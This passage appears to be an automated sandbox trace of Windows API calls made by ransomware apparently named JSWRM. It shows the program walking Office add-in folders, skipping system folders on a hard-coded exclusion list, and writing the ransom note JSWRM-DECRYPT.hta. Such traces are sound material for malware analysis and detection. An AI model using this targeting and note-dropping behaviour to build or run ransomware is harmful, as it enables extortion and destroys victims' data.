(HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0123.224] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241218, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.224] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.224] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1f19f0 [0123.224] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b650 | out: hHeap=0x1e0000) returned 1 [0123.224] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0123.224] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0123.224] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfbc97147, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfbc97147, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfbce360e, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xeaa8, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Client.Excel.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0123.224] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2=".") returned 1 [0123.224] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="..") returned 1 [0123.224] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="...") returned 1 [0123.224] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="windows") returned -1 [0123.225] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="recovery") returned -1 [0123.225] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="perflogs") returned -1 [0123.225] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="documents and settings") returned 1 [0123.225] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.225] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="system volume information") returned -1 [0123.225] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="msocache") returned -1 [0123.225] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e88 [0123.225] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.225] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0123.225] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x22ce70, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Excel.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.225] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e88 | out: hHeap=0x1e0000) returned 1 [0123.225] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233230 [0123.225] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.225] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.225] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d260, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Excel.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.225] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233230 | out: hHeap=0x1e0000) returned 1 [0123.225] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x245200 [0123.225] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f19f0 | out: hHeap=0x1e0000) returned 1 [0123.225] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.225] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0123.225] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x22f6470, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x22f6470, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x22f6470, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x28040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Client.Windows.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0123.225] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2=".") returned 1 [0123.225] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="..") returned 1 [0123.225] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="...") returned 1 [0123.225] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="windows") returned -1 [0123.225] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="recovery") returned -1 [0123.225] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="perflogs") returned -1 [0123.225] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="documents and settings") returned 1 [0123.225] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.225] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="system volume information") returned -1 [0123.225] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="msocache") returned -1 [0123.225] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c18 [0123.225] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0123.225] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0123.225] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x22ce70, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Windows.resources.dll", lpUsedDefaultChar=0x0) returned 45 [0123.226] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c18 | out: hHeap=0x1e0000) returned 1 [0123.226] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233230 [0123.226] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0123.226] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.226] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x22cdc8, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Windows.resources.dll", lpUsedDefaultChar=0x0) returned 45 [0123.226] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233230 | out: hHeap=0x1e0000) returned 1 [0123.226] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x244978 [0123.226] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x245200 | out: hHeap=0x1e0000) returned 1 [0123.226] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.226] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0123.226] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf6bad1cb, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf6bad1cb, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6bad1cb, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x32aa8, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Document.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0123.226] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2=".") returned 1 [0123.226] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="..") returned 1 [0123.226] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="...") returned 1 [0123.226] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="windows") returned -1 [0123.226] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="recovery") returned -1 [0123.226] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="perflogs") returned -1 [0123.226] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="documents and settings") returned 1 [0123.226] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.226] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="system volume information") returned -1 [0123.226] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="msocache") returned -1 [0123.226] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0123.226] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0123.226] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0123.226] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x22d298, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Document.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0123.226] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0123.226] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0123.226] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0123.226] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.226] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x22cdc8, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Document.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0123.226] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0123.226] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x245200 [0123.226] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x244978 | out: hHeap=0x1e0000) returned 1 [0123.226] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.226] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0123.226] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfa853100, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa853100, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfa853100, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x8b040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0123.227] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2=".") returned 1 [0123.227] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="..") returned 1 [0123.227] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="...") returned 1 [0123.227] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="windows") returned -1 [0123.227] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="recovery") returned -1 [0123.227] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="perflogs") returned -1 [0123.227] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="documents and settings") returned 1 [0123.227] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.227] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="system volume information") returned -1 [0123.227] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="msocache") returned -1 [0123.227] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bfb8 [0123.227] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0123.227] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0123.227] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x22d298, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.MashupEngine.resources.dll", lpUsedDefaultChar=0x0) returned 36 [0123.227] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bfb8 | out: hHeap=0x1e0000) returned 1 [0123.227] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0123.227] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0123.227] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.227] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x22d260, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.MashupEngine.resources.dll", lpUsedDefaultChar=0x0) returned 36 [0123.227] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0123.227] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f4d0 [0123.227] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x245200 | out: hHeap=0x1e0000) returned 1 [0123.227] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.227] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0123.227] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfa853100, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa853100, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfa853100, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x8b040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 0 [0123.227] FindClose (in: hFindFile=0x2320c0 | out: hFindFile=0x2320c0) returned 1 [0123.227] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f4d0 | out: hHeap=0x1e0000) returned 1 [0123.227] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b398 | out: hHeap=0x1e0000) returned 1 [0123.227] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b568 | out: hHeap=0x1e0000) returned 1 [0123.227] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf00d5872, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x59f29de, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x59f29de, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x1fc8d4, cFileName="lv", cAlternateFileName="")) returned 1 [0123.227] lstrcmpiW (lpString1="lv", lpString2=".") returned 1 [0123.227] lstrcmpiW (lpString1="lv", lpString2="..") returned 1 [0123.228] lstrcmpiW (lpString1="lv", lpString2="...") returned 1 [0123.228] lstrcmpiW (lpString1="lv", lpString2="windows") returned -1 [0123.228] lstrcmpiW (lpString1="lv", lpString2="recovery") returned -1 [0123.228] lstrcmpiW (lpString1="lv", lpString2="perflogs") returned -1 [0123.228] lstrcmpiW (lpString1="lv", lpString2="documents and settings") returned 1 [0123.228] lstrcmpiW (lpString1="lv", lpString2="$RECYCLE.BIN") returned 1 [0123.228] lstrcmpiW (lpString1="lv", lpString2="system volume information") returned -1 [0123.228] lstrcmpiW (lpString1="lv", lpString2="msocache") returned -1 [0123.228] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b0e0 [0123.228] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b1c8 | out: hHeap=0x1e0000) returned 1 [0123.228] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b568 [0123.228] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22aff8 [0123.228] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0123.228] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22aff8 | out: hHeap=0x1e0000) returned 1 [0123.228] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\lv\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\lv\\jswrm-decrypt.hta")) returned 0xffffffff [0123.229] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0123.229] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0123.229] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b0bc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0123.229] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0123.229] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24f1e0 [0123.229] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0123.229] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x250fb0 [0123.229] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24f1e0 | out: hHeap=0x1e0000) returned 1 [0123.229] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22bad8 [0123.229] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0123.229] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bad8 | out: hHeap=0x1e0000) returned 1 [0123.229] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\lv\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\lv\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0123.230] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0123.230] WriteFile (in: hFile=0x338, lpBuffer=0x345b1d0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b19c, lpOverlapped=0x0 | out: lpBuffer=0x345b1d0*, lpNumberOfBytesWritten=0x345b19c*=0x230c, lpOverlapped=0x0) returned 1 [0123.231] CloseHandle (hObject=0x338) returned 1 [0123.231] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0123.231] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x250fb0 | out: hHeap=0x1e0000) returned 1 [0123.231] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b568 | out: hHeap=0x1e0000) returned 1 [0123.231] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22bad8 [0123.231] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b568 [0123.231] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b1c8 [0123.231] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b650 [0123.231] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0123.231] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b650 | out: hHeap=0x1e0000) returned 1 [0123.231] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\lv\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\lv\\jswrm-decrypt.hta")) returned 0x20 [0123.231] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0123.231] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b1c8 | out: hHeap=0x1e0000) returned 1 [0123.231] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22ae28 [0123.231] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\lv\\*.*", lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf00d5872, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x59f29de, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x401c0c47, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName=".", cAlternateFileName="")) returned 0x231f40 [0123.231] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0123.231] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf00d5872, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x59f29de, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x401c0c47, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="..", cAlternateFileName="")) returned 1 [0123.231] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0123.232] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0123.232] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x401c0c47, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x401c0c47, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x401c0c47, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0123.232] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0123.232] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0123.232] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0123.232] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0123.232] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") 